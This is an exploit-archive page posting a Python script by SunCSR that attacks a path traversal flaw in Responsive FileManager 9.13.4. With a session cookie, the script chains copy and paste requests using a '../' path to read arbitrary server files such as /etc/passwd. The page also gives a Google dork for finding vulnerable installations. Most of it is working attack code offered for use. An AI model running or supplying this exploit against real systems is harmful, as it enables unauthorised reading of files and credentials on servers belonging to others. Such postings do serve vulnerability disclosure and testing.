Responsive FileManager 9.13.4 Path Traversal

Responsive FileManager 9.13.4 Path Traversal: Posted Jan 5, 2021; Authored by SunCSR; Responsive FileManager version 9.13.4 path traversal exploit. Original discovery of this finding is attributed to farisv in December of 2018.; tags | exploit, file inclusion; SHA-256 | e60dde7a6fb3e57f25bc60645a9e6b12692e86e856f5127f0306b5a233418882; Download | Favorite | View

Responsive FileManager 9.13.4 Path Traversal

# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
# Date: 12/12/2018 (PoC)
# Date: 04/01/2020 (Auto Exploit)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: intitle:"Responsive FileManager 9.x.x"
# Vendor Homepage: https://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4
# Version: < 9.13.4
# Tested on: Linux 64bit + Python3

#!/usr/bin/python3

# Usage: python exploit.py [URL] [SESSION] [File Path]
# python3 exploit.py https://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd

import requests
import sys

def usage():
  if len(sys.argv) != 4:
  print("Usage: python3 exploit.py [URL]")
  sys.exit(0)

def copy_cut(url, session_cookie, file_name):
  headers = {'Cookie': session_cookie,
  'Content-Type': 'application/x-www-form-urlencoded'}
  url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
  r = requests.post(
  url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers)
  return r.status_code

def paste_clipboard(url, session_cookie):
  headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
  url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
  r = requests.post(
  url_paste, data="path=", headers=headers)
  return r.status_code

def read_file(url, file_name):
  name_file = file_name.split('/')[-1]
  url_path = "%s/source/%s" % (url,name_file) #This is the default directory,
  #if the website is a little different, edit this place
  result = requests.get(url_path)
  return result.text

def main():
  usage()
  url = sys.argv[1]
  session_cookie = sys.argv[2]
  file_name = sys.argv[3]
  print("[*] Copy Clipboard")
  copy_result = copy_cut(url, session_cookie, file_name)
  if copy_result==200:
    paste_result = paste_clipboard(url, session_cookie)
  else:
    print("[-] Paste False")
  if paste_result==200:
    print("[*] Paste Clipboard")
    print(read_file(url, file_name))
  else:
    print("[-] Copy False")

if __name__ == "__main__":
  main()

Top Authors In Last 30 Days

Red Hat 228 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 65 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Responsive FileManager 9.13.4 Path Traversal

Responsive FileManager 9.13.4 Path Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Responsive FileManager 9.13.4 Path Traversal

Share This

Responsive FileManager 9.13.4 Path Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems